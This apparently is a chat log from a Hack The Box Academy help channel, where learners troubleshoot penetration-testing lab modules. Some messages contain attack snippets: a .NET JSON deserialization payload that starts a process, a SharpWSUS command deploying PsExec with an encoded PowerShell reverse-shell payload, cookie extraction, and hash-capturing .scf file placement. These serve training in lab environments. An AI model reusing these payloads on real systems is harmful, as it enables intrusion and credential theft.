#modules
Try resetting the target, or sometimes just resetting your vm gets it to work
All I can say is it works on my machine
hmm
So not sure what the issue could be
Reach out to support with VPN logs, they're best placed to help with this as Marcie said
okay thx
Have you checked the help article on VPN connection troubleshooting?
I'll check it again tomorrow and contact support if needed
Well the target they're doing is a public:port so the vpn shouldn't matter
But it working on pwnbox and not their kali machine is pointing to something in the install
Sounds like an issue with the IPs being blocked by your ISP then unfortunately :\
I also checked my firewall because maybe somehow it was blocked by it but nothing in logs
If you can, create a new kali vm to test with
They don't have a set subnet
Can I DM someone about the MSSQL, Exchange, and SCCM Attacks Skills Assessment? I'm not sure if the lab is buggy or if I'm going down the wrong path... I'm getting an error but not sure if it's intended. Tried restarting the lab and refreshing
"If you encounter an error while connecting to Outlook Web Access (OWA), please wait and refresh the website until the error is resolved."
Since they're on public ip ranges
Isn't there any range of public IPs which are used by HTB boxes?
Not that I'm aware of
hmm okay
I mean, you could check one IP you've been given and look at the IP range of the provider, however this isn't official advice
Those ranges may either not be accurate, or may change.
nvm, I am unlucky then 😄 I'll try to connect to different ISP or I'll have to work through pwnbox
Which module / section out of interest?
A weird thing that may help is changing the vpn region: as far as I'm aware that does affect the docker spawns
Could see how it could do, but I don't know the logic behind regional spawning any more.. can't hurt
thx guys, I'll try
Does anyone else have the multi monitor issue using VMWare Workstation 17.6? Not sure where else I should post this.
Ask vmware support
This channel is for help with academy modules, not random technical issues
Is there somewhere here I could ask?
#1024429874246590575, maybe, but vmware/broadcom support is your best bet
..better invest in funeral insurance if you want to count on vmware support, and that was before broadcom 😐
Yeah, I can't get ahold of them. Besides, their page states the issue I'm having has no workaround.
"Included in my will is a list of open VMware support requests bequeathed to my children"
ouch
Well, gotta leave a legacy I guess
..or curse
They'll remember you either way
tbh I'd try the VMware Workstation section on VMware Communities and/or r/vmware on reddit.
Hey guys, I have a question about file inclusion, it's about php code, but I don't want to ask here because it can contain spoilers, anyone private message?
I'd at least mention the module name and section
I will write it quick but not showing anything
But thank you for not posting spoiling content
File inclusion module section PHP wrappers
It's about the wrappers, so I found the php code with the expect extension enabled, but when I do the needed file inclusion to read the id of the user it doesn't give it, why? I found the flag with another wrapper but I'm curious why it doesn't display anything?
Hopefully someone will come back to you to offer a nudge, but I think that's enough to give them an idea as to where you are 🙂
yup thanks 🙂
Second question too: is it possible to find the php version another way than manually typing it? Question from this text in the php wrapper section, file inclusion module
I think phpversion() gets the version?
Also this is taken out of context of the rest of the section
Yeah I know, but what if you can't use those types of commands, like you only have access to the website
If you can get it to execute arbitrary php code, you can get the version
You're kinda overthinking it as well
Also: not every example is doable
the problem here (for me) is that I can't execute my arbitrary code without knowing the php version to access the .ini file to identify which wrapper is active or not
Also if you use curl -I; you might see x-powered-by: header
don't show it here but I find my way with the php://input wrapper to you 🙂
Has anyone that has done Intro to C2 with sliver had major issues trying to enumerate / get information out of the parent domain for the final step of the final skill assessment? Every time I specify -domain <parent-domain> with a powerview/sharpview command I get errors. I was able to use nltest to see some trust info, but I can't get the SID of the parent domain
I have been stuck here for a few days beating my head against the wall...
...and of course I just found a new command that got me the SID of the parent domain
still can't create a diamond ticket 🤦‍♂️
been a while but dm
I think I JUST got it
Phew, yeah got it. I need to study up on kerberos more for sure
wanna throw me a bone on this one? I get through the xss filter on the webpage, validated that it executes because it's interacting with my script on exploit server, but can't seem to extract what I am looking for
I have been following the exact instructions from the socat redirection with a reverse shell section of pivoting, tunneling and port forwarding module. I follow the exact instructions and start the listener on the pivot host, try to exploit it, exactly command for command line for line character for character, except changing the IP address to be the right IP address, and yet it doesn't give me a reverse shell.
Why is the exploit completed but no shell is returned?
I answered the question correctly based on the section I just want the hands on portion of it to work. I got my computer back finally.
Also, the VPN connection to HTB Academy isn't working and I would like some help troubleshooting that. I can't seem to ping the pwnbox from my kali VM.
anyone able to help me out?
I tried both payload from previous section and the current one
I also tried both windows and linux payload
@quasi wave regarding the VPN, have you raised a ticket with support? As I said other option would be to raise a post in #1024429874246590575 with the logs showing what's going on with the connection
I can't help with the module content I'm afraid
..but if you have the VPN logs, I may be able to take a look if you raise it in #1024429874246590575
I'm about a little longer if you can post your logs there @quasi wave
for the VPN issue I understand this
and I will do that but for my other issue that doesn't really make sense. I was able to connect to the target from pwnbox just not from my local vm. and I got the target ubuntu server listening and the pwnbox listening.
and ran the metasploit module and it didn't work
like at all. the exploit completed but there was no shell returned
all the IPs are private no? the only IP that is public is 0.0.0.0 that I see
10.129.x.x and 172.16-32.x.x are private IPs
Some targets are within the VPN, others are hosted in public networks
But yes you are correct, those ranges are private
If you're having trouble accessing those IPs while connected to the VPN, then all I can suggest is sharing the logs with support, along with an output of your routing ip route and interfaces ip link
right I can access the IPs from pwnbox tho. I'm going to talk to support about my VPN connection. but my other issue has to do with completing the actual module.
I followed the instructions exactly and the metasploit module completes the exploit but I don't get a reverse shell
and I have tried multiple iterations of it
Right, but the Pwnbox connection is different from your connection
right, I know
There could be many differences that impact the connection
and I'm saying I'll get help with my connection
but what I need help from you with is something else
I'll send you screenshots because it would spoil the module if I posted publicly
Gotcha, sorry I was on the subject of connection being the issue. Module content I can't help with I'm afraid, so sorry to derail the conversation.
Mention the module and section again, and hopefully someone can advise
Ok so I did the question correctly for the Socat Redirection with Reverse Shell section of Pivoting Tunneling and Port Forwarding module.
but that's not my issue
the issue is I have been following along with the module (the question is just true or false so that's not my question) but anyway and I got the socat listener running on the ubuntu pivot
As it's wrong
It's best to set LHOST specifically to your IP on the interface connected to the network, rather than 0.0.0.0
Because of my roles
The bot flagged it for some reason, and removed it
ok thanks
You can see it's failing to bind to 0.0.0.0. 0.0.0.0 is essentially saying "bind to all IPs available"
Specify your current VPN IP instead to LHOST, or any other variable when triggering a connect back
I'm sure that's covered somewhere in the module
Good luck!
ok thanks. I am just trying to make it work in pwnbox
I will worry about the VPN after I get it working in pwnbox
can I DM you?
Make sure you're not using the VPN at the same time as the pwnbox
Ask in #1360673885376483378 - you need to verify your account by following the instructions in #welcome first @south quiver
Please don't mention specifics about active machines either
I'm gonna reread the sections tomorrow
should be fine but I think I need to get some exercise and try again
I'll say if you're still getting errors with what you're doing in what you sent me, you've things to change. Research the errors. But yes, going back over the modules related would not be a bad idea at all
i cant find the download ovpn config file button (is it disabled or something or i am just being blind lol) (in every command injection module)
You can download it from here: https://academy.hackthebox.com/vpn
Thanks man
does the same file works for every lab? (i am using this vpn thing first time for acad ;v)
No, the Academy VPN is for Academy only.
Boxes/Prolabs are different VPNs themselves
but Academy VPN works on every module in Academy if that's what you're asking
got my answer thanks
I'd recommend the TCP VPN
okie
do you know what tool to install to show ip in taskbar like pwnbox?
No. It's just there in Kali for me.
i did it with a bash file and app cmdlet preference widget : )
#1234357888114364508 if you believe it to be a problem
I might have understood it wrong, let's see what the others think
i'm telling you to post it in #1234357888114364508 -> you're more likely to get a positive answer there, and if it's an issue the module author/staff can fix it
that way it doesn't get buried
worst case; it's not a typo, and it does indeed work that way
hello, i want to ask for this last question
maybe any clue/hint that might helpful?
i try to read forums about this but still got stuck on it
Obtain a shell on the system and submit the contents of the flag in the /home/erika directory.
wordpress skill assessment
@eager ledge @rustic sage take it to DM please
Those messages contained spoilers about a module above Tier 0.
Soz, didn't know a better way to hide it 😂
If in doubt, take it to DM 😉
#Attacking Active Directory & NTDS.dit : John Marston IT Director, Carol Johnson Financial Controller and Jennifer Stapleton Logistics Manager. i created a wordlist with help of given username but i am not able to crack username and password anyone can help ?
The question specifies whose username to find
John Marston's
hi guys so i am bit confused
I am told to perform extrasid attack on windows
however upon rdping into the machine
there is no powerview, no mimikatz or rubeus
how am I meant to do this?
Active Directory Enumeration & Attacks
Attacking Domain Trusts - Child -> Parent Trusts - from Windows
nvm it looks like i need to transfer tool from linux to windows
@rustic sage If it's the skills assessment you'll need to upload tools. If it's just the lab/module question it should be in C:\tools
Can anyone help with this? 🙏
yy should i use windows with vm linux or linux with vm windows for soc analyst path
im everyday linux user but when doing rev eng etc need to use windows so whats better in this situation
any one please help me with File Upload module ...
```
┌──(kali㉿kali)-[~/htbacademy/windowsprivesc]
└─$ chmod 777 cookies.sqlite
┌──(kali㉿kali)-[~/htbacademy/windowsprivesc]
└─$ sudo python3 cookieextractor.py -dbpath="cookies.sqlite" --host slack --cookie d
Traceback (most recent call last):
  File "/home/kali/htbacademy/windowsprivesc/cookieextractor.py", line 39, in <module>
    main(args.dbpath, args.host, args.cookie)
  File "/home/kali/htbacademy/windowsprivesc/cookieextractor.py", line 21, in main
    cursor.execute(query)
sqlite3.OperationalError: no such table: moz_cookies
┌──(kali㉿kali)-[~/htbacademy/windowsprivesc]
└─$ sqlite3 cookies.sqlite ".tables"
moz_cookies
```
whats wrong with this can anyone help me, its in Windows Privilege escalation module > Pillaging
bro what kind of script is it, I mean cookieextractor?
Use win 10 vm in linux. Make sure to use Qemu instead of v-box
Also give it some juicy ram and cpu if you can
im rn on 16gb ddr 5 ram. Option 1 is to buy another thinkpad only for linux or option 2 is to buy more ram (both options are expensive in this situation)
Qemu is source efficient. This should be enough
Just ask
Hi all, can someone give me a lil hint about Hard Skill Assessment of HTTP Misconf?? Ty!
Windows Privilege Escalation > Windows Built-in Groups
https://academy.hackthebox.com/module/67/section/601
Here's the question. The example shows how to extract NTLM hashes from NTDS.dit. I created a shadow copy of C:\ and copied the NTDS.dit file. I want to extract the hashes using DSInternals on a Windows host. In the example, there's a command:
$key = Get-BootKey -SystemHivePath .\SYSTEM
But it's unclear where this SYSTEM comes from. It's not the result of exporting with the command:
reg save HKLM\SYSTEM SYSTEM.SAV
This file was already in the C:\Tools folder.
So where do I get it from?
I've already tried everything..
My notes showing me that for Skills Assessment you need to use SeBackupPrivilegeCmdLets.dll and SeBackupPrivilegeUtils.dll under C:\Tools. With this privileges just copy flag.txt
yes, I tried, on the last screenshot
did you find the unkeyed value yet?
Do it with flag.txt not NTDS
I got the flag, everything worked out there. I'm trying to work with NTDS.dit, as described in the example
it work via secretsdump. but not work via DSInternals
Not sure then, being a while since I did that module tbh
maybe one of the moderators knows?
if it's already written, you need to read and try..)
The file hash for both files are different
I'm trying to make work with DSInternals
The ACL is also different, but it should be a problem since we have FullControl with svc_backup
DM
Can anyone give a nudge on MSSQL, Exchange & SCCM skills assessment?
||Trying to move laterally from DB01 to DB02, Have sysadmin as domain user and local admin as a local user on DC01 but struggling ||
I got error using DSInternals with both files (the one in the Tools directory and from directly saving it with reg.exe)
I was able to get it partially working but something while parsing the hive was still erroring out.
I’ll retry in a bit
Hi, I have the same problem, did you fix this? Also can someone help to solve this challenge. Tried many variations and when sending in 'Send group in sequence (single connection)' the first request/response panel is empty but the second request/response panel shows information and the connection is extremely slow in function 'Send group in sequence (single connection)'. Current speed is: $ sudo ethtool eth0 | grep Speed
[sudo] password for kali:
Speed: 1000Mb/s. It's for TE.CL exploitation
You abused SQL Links?
Yeah managed to get DB02, just looking at the SCCM server now
Just not sure if I've used the intended way...
You probably need to enum links again
Same with the first question, the account I was given has no mailbox assigned
oh yeah... forgot about that
It has to do with permission. I think it's how the script is written.
Anyone managed to resolve this module using DSInternals? Every time I try to get the bootkey I get an error
```
PS C:\temp> reg save hklm\system system.save
The operation completed successfully.
PS C:\temp> $key = Get-BootKey -SystemHiveFilePath C:\temp\system.save
Get-BootKey : Requested registry access is not allowed.
At line:1 char:8
+ $key = Ge...
```
I went in to use the DA to PtH into an RDP session and confirm the information in the Forum, and it worked
PS: Can't confirm 100% that the behavior of Get-Bootkey is what it's detailed in that post. Would have to go through DSInternal's code.
You can get the version of vsftpd once you have entered the target system via SSH, with the user John. Have you tried?
Edit: Of course as soon as I ask here ... nvm
Yes, it's my problem!
therefore, in this case, I conclude that I can only use secretsdump. DSInternals will be useful if I have NT AUTHORITY\SYSTEM access
I'm stuck on the Situational Awareness section of the Windows Privilege Escalation module and I have no clue what to do.
I need to find whats blocked other than cmd.exe and changed their current command to find exe files that are denied but everything is allowed in system32.
Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\*.exe -User Everyone
I'm still struggling to connect to it. The ports 5985,5986 seem closed, pswa is open but denies authentication
try other ports that you have seen before maybe. higher ones
How to message in general
I tried up to port 9999 on backup, should I target wsus ?
@everyone
Fellows, bloodhound on Kali. The repos install 4.3.1 is maybe 'legacy'. I'm having trouble getting sharphound running on targets as a result. Am I missing an easy solution or is the fix to install the newest Bloodhound CE?
idiot
Hoping I can avoid newest installs which look docker only.
Follow the instructions in #welcome
Hey! Got stuck at this point in "linux fundamentals":
Any idea how I can solve this?
I need help @dapper moth 😩
Help with what?
No double posts, please.
With what, my friend?
🐚 here you go @leaden island
Am i supposed to upload tools and do priv esc ?
Wasn’t that hard to get a shell now was it 
I got the shell but
The flag is under administrator acc
It was the easiest host to get a shell so i believe im missing something
I did all hosts without any hints (until now) am i good
Can anyone give a hint for MSSQL, Exchange, and SCCM Attacks skills assessment last question?
Sure! There is a guide in one of the sections. Try performing the exact steps
You might find something “juicy”
I've read it again and again, will have another look through 😅
You can DM
I just don’t want to give too much spoiler in the channel
Oh sorry, I remember being here and switching to general and now I'm confused as to why it didn't work, it must have been lagging, sorry bout that
Hii do u guys know how to help unban accounts??
not that kind of hacker chat here, you'll likely be escorted out... though I don't know this constitutes serious rule break
Oh okay sorry. Do u guys know any servers that can help me with that tho?
Yeah, the hint made it all
I would have known it if my brain wasn't telling me "all the hosts were dedicated to web applications, so this has to be"
help please im doing Active Directory Enumeration and attacks on Attacking Domain Trusts - Child -> Parent Trusts - from Linux
The question is Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.
It wants me to perform "lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240" but I don't have a password for that user?
Hello,
It looks like EyeWitness is like the number 1 tool to do web enumeration from the CPTS path. I'm on arch linux and I wanted to know if anybody knew how to fix these errors that won't go away:
~/tools/EyeWitness/Python/EyeWitness.py -f subdomains.txt -d eyewitness_report
And I get the output:
Starting Web Requests (10 Hosts)
Message: Invalid Host header localhost:60779Message: Invalid Host header localhost:45027
Message: Invalid Host header localhost:37841
Message: Invalid Host header localhost:48379
Message: Invalid Host header localhost:47711
Message: Invalid Host header localhost:35231
Message: Invalid Host header localhost:41165
Message: Invalid Host header localhost:40303
Message: Invalid Host header localhost:57337
Message: Invalid Host header localhost:46867
Finished in 13.85072922706604 seconds
[*] No report files found to open, perhaps no hosts were successful
I made sure the targets were reachable with curl, and I tried with my proxy but it doesn't send anything to my proxy...
I've run out of ideas of how to troubleshoot this.
We are not interested in such things here so spammers may leave
This is a cybersecurity professionals chat
Did you update your host file?
Password is in the previous module
yes sir!
10.129.229.147 inlanefreight.local blog.inlanefreight.local careers.inlanefreight.local dev.inlanefreight.local etc...
Also, if I hadn't, the curl commands wouldn't have worked
hey, im having trouble with the nocturnal machine, can you give me a minor hint on the initial foothold, really struggling here(
Guys has anyone passed Android Fundamentals?
not sure if I'm allowed to ask this here. I asked it in #general a few weeks ago - are any of you still logged in to Academy through the old sign in and not through sso?
I think the login only works via SSO
The format of subdomains should be http://domain.com
Hi guys anyone from htb here i mean working in htb i have a issue to share.
Reach out to support
you need to log out and log back in
Hey guys I'm stuck on a question in the file inclusion module, remote file inclusion section, they say that we need to find a rfi, which I did, and to find the flag in one of the directories located in the / path, which I found, but when I cat it I receive a string with numbers and letters (it is not encoded) but when I put it in as the answer it is not correct
lol my bad there was a space in my answer 🤡
Great! Use this command 'runas /user:netadm cmd' or logout and login again
Hi guys i have a question
i tried to hack my own wifi using kali linux but i dont have a wlan, is there another tools in kali you dont require a wlan in??
Please answer me
In about system, scroll all the way down in settings
The thing that u click it few times for developer options
there is such a huge amount of everything i can't understand where is build number
Software info, firmware info, related strings
which command did you use to unzip flag.zip in adb section?
I didnt do any android modules, i just work as a repair tech
But i believe unzip xxx.zip will do
does nothing
Idk, google do
Yes I know, After you escalate you need to log off and log back in to get admin privs or you can run that command as an alternative to get an admin shell
It's because the service is already running
Logout and log back in and try it again, if it still doesn't work terminate the instance and spawn a new target
No there is a clean up process
In that module, they have showed a clean up process, you need to do that
You're in an administrative shell
This didn't work because of that
Close all your terminals first
I already wrote above that the DNS service works correctly. There is no need to delete the registry key, it does not exist. Before cleaning I could not perform nslookup localhost. Now I can. But I can't restart the service
@quartz sundial please refrain from posting content from the module when asking for help when the module is above tier 0
Guys, help
I am at Intro to Network Traffic Analysis and cant find TCPDump-lab-2.zip...
I didn't publish any screenshots from the module
there's the > resources < button, some sections may have a dl next to the questions
thank you, my saviour
Marcie hello have you done Android Fundamentals?
no
Don't use -L when connecting
?
I mean i went off the most common issue that happens
But when you connect to smb you have to specify a share
Oh
\\\\someip\\someshare
Alternatively just do //someip/someshare
Smbclient accepts both
@outer mirage why did you delete your messages?
??
Jon was never there 🥸
simple internet paranoia that their professor instilled in their students
I have a problem at the end of the shell and payload exam. I have started freerdp and I got the target ip but the instance has no internet for search, why? How can I go to apache??
firefox
😉
Try typing it in the terminal
It works!! Great, thank you! It's my first time that it's happened, the firefox was hidden
@fathom pendant can we get in VC for a sec?
Hi guys, currently facing a problem in this module 'Authentication Bypass via Parameter Modification', can't figure out what's the issue to acquire the user_id. Here's my payload 'ffuf -w ./token.txt -u http://94.237.52.228:41679/admin.php?user_id=FUZZ -c -t 200'. In the token.txt I am using 1 (not 0001) to 9999. Any hints?
did you filter correctly?
any thoughts on this?
Did you add a / to the end?
yup
Did you try not doing that? I also forget but there is a curl flag to follow links, -L I think?
Did you try visiting in browser?
yes, still shows the same thing "301 moved permanently"
i havent tried using the -L flag though
Hey all, I have a quick question about the VM management module, specifically as it pertains to installing Nessus on a Pwnbox machine.
I have started the process prior to tonight and I noticed as it gets finished compiling plugins the machine runs out of disk space and I never got it to completion the first time around. I am working again tonight on re-configuring the box to perform the vuln scans required but I am just curious if maybe it was a one off issue or if anyone else has seen problems with the required size of the installation vs the pwnbox resources allotted?
which module and section?
Nessus Skills Assessment under vulnerability assessment.
There's no need to install Nessus, read the Reminder section.
Oh wait, I think I see the problem... I might be installing the software when its already available.
Thanks for the nudge, apparently working on this late at night impacts my ability to read nicely placed banners.
They are all showing status 200
that doesn't mean much
status 200 could just be a default page that loads, not necessarily a 404
and since you're on a page that you know exists; you would not expect a 404 error
Hi
Module: Windows Privilege Escalation
Section: Interacting with Users
Section link: https://academy.hackthebox.com/module/67/section/630
I got the hash of the sccm_svc user.
Upon checking the writeable directories on the shares, I could see a lot of them and couldn't figure out which one was frequently accessed by other users. So, I added .scf file on all those directories. From evasion point of view, I am sure that this is not the best practice. So, my question is how do you figure out which one is most accessed location?
If you're trying to evade detection as much as possible, I suppose you'd just make an educated guess or place it in a share you know is eventually going to be accessed by a user belonging to a certain group.
Hi all Question about Password cracking Module
Module name Passwd, Shadow & Opasswd
Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.
When I try to use hashcat on my vm to crack the hash it gives Status...........: Exhausted
did anyone face this issue during cracking the password for this module question
Are you using the provided wordlist?
yep I did use the resources Password list
and I did mutate the same password list and tried getting the same error
so I thought
After mutate it became big so I split in to 6 separate file and tried still no luck
If i ask ChatGPT about something from the modules, will that constitute a content leak?
As long as you don't give it information for modules above tier 0, you're fine
DM me with the steps you took & commands you used
Ok Thanks
I am stuck doing the administrator machine. Any help would be appreciated.
I am getting an error to get identified
Identification error: please contact an online Moderator or Administrator for help.
Hi everyone, I just got started with CPTS modules and in Footprinting section, I am having a bit of a trouble wrapping my head around it.
There are a lot of entries in DNS Record like A AAAA NS CNAME TXT and all. how do I know when to use which query??? Its a bit confusing for me.
Hi. Each of those records has a meaning. For example, A records hold the IP address of a domain. You can refer to the types here:
https://www.cloudflare.com/learning/dns/dns-records/
You then query using tools like dig or nslookup for the type of record you're searching for.
So, is it as simple as, we query for ip addresses directly from the DNS servers using these commands?
Yes and no.
Yes as in you can simply query the DNS server to resolve an IP address.
No as in there are other cases.
ohkk, thanks for sharing this. let me have a look
Hi im using pwn box doing the active directory enumeration and attacks but the RDP window just becomes black every time. Have restarted pwnbox and target multiple times but can get into the RDP session
I believe dig has an ANY option to retrieve all records possible
The ANY option doesn't always work properly though (I've experienced cases where it hasn't listed out some records). I'd suggest to always enumerate all the types one by one to double check.
When it becomes black, click in the window and hit the Enter key. That should resolve the issue.
this is so cool, you can retrieve records for a specific service
Thanks god yes it helped
Well, it's less so "service", more so the "hosts" you're gathering the info for.
Think of DNS like a phone book: It's like looking up numbers associated with a certain company.
yeah I mean the same, just different words but you get the gist
Yeah, got it. I just wanted to make sure you weren't misunderstanding 😅
I have a question does DSA help in cyber security???
Yes, it can help. Especially with cryptography.
Does it also help in writing script
It could help depending on the type of script you're writing I guess.
Thanks @normal sand
hey guys for advanced deserialization module, for JSON deserialization, i dont understand why my payload doesn't work locally. I've already completed the section because it worked against the target live, but on my own local machine it doesnt. Even the PoC i built with csharp works while following instructions from the module.
in the module, dnspy will create an exception error and spawn notepad.exe from w3wp.exe, but in my dnspy it does not create the exception error and does not spawn notepad.exe
this is my payload
||{"$type":"System.Windows.Data.ObjectDataProvider, PresentationFramework","ObjectType":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","MethodParameters":{"$type":"MS.Internal.Data.ParameterCollection, PresentationFramework","$values":["C:\Windows\System32\cmd.exe","/c notepad.exe"]},"MethodName":"Start"} ||
i didn't change anything in the app code.. so unsure if its my env?
Is defender on?
Password attack module
Trying to log in to the machine using the given login details but looks like password is wrong is this usual
use xfreerdp then use ssh to enter the linux session, see the image under Scenario
oh got it thanks
that's another issue for me, I can't do RDP from my machine to windows boxes
I solved it! There is no -test in the answer as in the example.
I have to use the HTb instances to rdp in
do I have to change any VPN settings all the windows boxes I cant RDP in from my machine
No clue, maybe change MTU?
Ok I will try the MTU thanks
Awesome MTU did work 🙂
Do i get exp for my HTB Rank when i done a module in academy?
ok thx 🙂
I have the same question, did you get any additional hint? regards
I have trouble with this Introduction to Digital Forensics
Skills Assessment
Using VAD analysis,
I have used velociraptor and get about 80 rows of results
Hi, currently on the Windows Lateral Movement SA, trying to get access to ||backup|| via ||wsus|| but I seem to be unable to receive a reverse shell at WSUS.
||```
.\SharpWSUS.exe create /payload:"C:\Users\rossy\Desktop\PsExec.exe" /args:"-accepteula -s -d cmd.exe /c powershell -e JABjAGw....." /title:"NEwDadadad"
```||
Any way to monitor and analyze traffic with grpc in Flutter app?
Hey, I am working in Static Analysis from Windows Evasion Techniques module, I have an issue with the lab, I did everything correctly and I was undetected by AV but I could not retrieve the flag.
attacking common services easy
in the xss module regarding phishing in XSS assessment. I was able to inject a login page but had a really hard time cleaning up the page. Can someone look at my payload and let me know what i'm doing wrong ?
You want to look for pages that have both write and execute permissions. Those usually don’t exist but malware loves creating those to write and execute shell code in one go. If you apply that filter you will have very few potential candidates
Make sure you created a .net framework program and not a normal .net, your executable is supposed to be just a .exe and not one that comes with a .dll
sure
Girald in Android Emulators they want to provide build number of the device but there is a huge build number which one is the actual build number? I tried many versions and all of them are incorrect answer
I have the same question, could you give some help?
Unfortunately I remembered that I have the same problem 😅
I asked the support they told me they will contact me when they know the answer
Have you done anything from the skills assessment?
still
you gonna say something or just speak in stickers
still haven't done?))
yeap, if you wana chat at #general
may be dm?
what module is this?? I didnt know they had android stuff too
Android Fundamentals
with very strange questions I suppose you can pass them if you have step by step option
Yes I got build number but in build number they have huge amount of information and I can't understand where in this information the build number is
hmm you might have to look at sample build numbers and figure out lol
Lol I am that clever too but it doesn't work)))
I tried dozens of combinations but none of them is correct
Thank you
i solved this, but now i can't find the final answer in skills - Following the steps provided in the Native Apps section, develop and deploy an application that will print the string returned from the Build.MODEL constant. Use the 'Pixel 3a API 34 Google APIs' (other emulators might work as well). What is the value of this string?
When i run the app, it shows Hello Android! but it's not correct answer, so need to dig deeper.
gah, so BloodHound CE doesn't have any of the baked in queries like "shortest path". It looks like you can query the database for this sort of info but I don't know how to connect to neo4j (it's running on port 7474, but the credentials don't match what I'm using for bloodhound UI on 8080). Has anyone bookmarked a good tutorial on navigating CE? It's hard to find good info because of how much is out there about legacy.
Can anyone help me with Wi-Fi Evil Twin Attacks - DNS Spoofing section?
Hello! I am getting this error : KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type) on the final part of the skills assessment of the Active Directory Trust Attacks module. Can someone help me, please?
PassTheCert https://github.com/ly4k/Certipy/issues/205
I deployed an AD Environment for my project but I have been facing some issues lately. I successfully exploited the Certifried Vuln in the AD env and made sure to document the steps and also took a...
Wait a little bit for AD CS to start
There is a post in #1234357888114364508 about it
Guys hello has anyone completed Android Fundamentals?
Hi all, I'm trying to get started on Whitebox Pentesting 101: Command Injection module, and I'm not sure how to connect to the docker image
"At the end of the Secure Coding 101 module, you should have been able to extract a link and an archive password, through reversing or exploiting the JavaScript code of that module:" <gives a path and a password>
I didn't take / buy the Secure Coding 101 module.
Start the target server as described in the module
got that part, but what then?
Have you read the text? It gives you the link, the corresponding password and tells you what you have to do with it
any beginner wanna learn together?
my browser somehow reset and now when i try to log back in via my google account i get an error
Hello mates
Any help with skill assessment in android fundamentals on last task where I should sign the already compiled apk and install it
Any suggestions please?
I have tried to unzip this apk and import in Android Studio like new project and then sign it
Not helped (
If you have a question regarding the module, it would be quicker to just ask it so someone who's done it can reply.
Yes, I read it, I just derped
I am seeking for such person noone has done.
any ideas?
@dark jay Please don’t share any flags
okayy
Hello, I am currently doing this and I have the same problem for the build number and also in the skills Assessment I have several answers that could be right for the first question but none seem to be valid it's weird.
Otherwise for the other exercises all is ok
I messaged support and am waiting for an answer from them. Btw I checked the file for the last exercise for skills assessment and it seems to be corrupt. Cause Android studio and other emulators are refusing to sign them.
and I am a bit confused about com.android.settings. application I have never seen something like that to be honest how such kind of application can exist ever.
For the skills assessment, everything went well except for the first question, so if you have a problem, don't hesitate to ask me if I can help.
hlw, myself imran, i am studying in 12th class and interested in cybersecurity and in my beginner level i am struggling in some issues or errors can anyone help to resolve my errors
hello guys i need help with Advanced XSS and CSRF module, I'm stuck on the XSS Filter Bypass exercise? Thanks in advance to the helpers
@unique smelt please don't spam all the channels with the same question. If your question is related to modules post it here.
ok !!
first you say post in modules then you say dont spam, everything o.k?
Not you.. I was talking to Imran890 who posted in a bunch of channels.
o.k sorry
if i have some questions and error so where i can get help ?
pardon buddy !!
Depends on what your questions are about. You'll need to follow the instructions in #welcome to gain access to most of the server.
ok!!!
hey guys i need some help on the service enumeration module, i just started and am kind of a noobie
somebody 😭
elaborate, thats not how this works.
State the module/section, description of the problem, maybe a screenshot of your attempts.
dang my bad
Service enumeration
Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.
Its just about using nmap and nc to find the flag but i think my IQ is 60 since i cant seem to find the flag
i did clear like 10 minutes ago cuz i was getting frustrated
What commands have you tried so far?
i've done the sudo nmap to see what connections there are, tried nc on all the open ports
Type out the actual nmap and nc commands you have tried
sudo nmap 10.129.113.255 --top-ports=10
nc -nv 10.129.113.255 (all open ports)
PORT STATE SERVICE
21/tcp closed ftp
22/tcp open ssh
23/tcp closed telnet
25/tcp closed smtp
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
443/tcp closed https
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
kevin you are goated if you can solve this for me
Instead of top ports command run a full port scan with the -p- param and see what you get
doing it, but i dont think any more will pop up
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
31337/tcp open Elite
Have you tried connecting to any of these ports ?
For example
nc <port> <IP>
which one do you want me to try ?
i did the command earlier but i would like to show you what I see
they want you to use -sV?
thats what the version scanning is for
I'm not awake yet, try -sV on nmap
nice
from the module: -sV Performs service version detection on specified ports.
PORT STATE SERVICE VERSION
21/tcp closed ftp
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
23/tcp closed telnet
25/tcp closed smtp
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp closed https
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3389/tcp closed ms-wbt-server
dang thank you for being so helpful TLattice
i didnt think people would just help strangers like that
not that many open
but if i do like the 110
nc -nv 10.129.113.255 110
Connection to IP 110 port [tcp/*] succeeded!
+OK Dovecot (Ubuntu) ready.
I'm trying to get proxychains to work, I edited and save the configuration file exactly how it says to in the module. When I run curl I keep getting a message saying that it cannot connect to server. I tried this running regular curl and it connects just fine. Has anyone else run into this?
i just see this and it keeps me waiting
if theres no flag then move on to the next
because youre connected to it
dang
my bad for only asking the stupid questions
ok no like
i netcatted every open port and all it does is connect
nc -nv
why did you only scan the top 10 ports
i scanned -p- after that
wait
let me try
it takes a lot of time is that normal @safe star
yeah nc all the ports and wait like 10 secs
yeah these .
so nc -nv -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
31337/tcp open ftp ProFTPD
on these
just like how u were doing before
wait a few secs on each one
22 port [tcp/*] succeeded!
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7
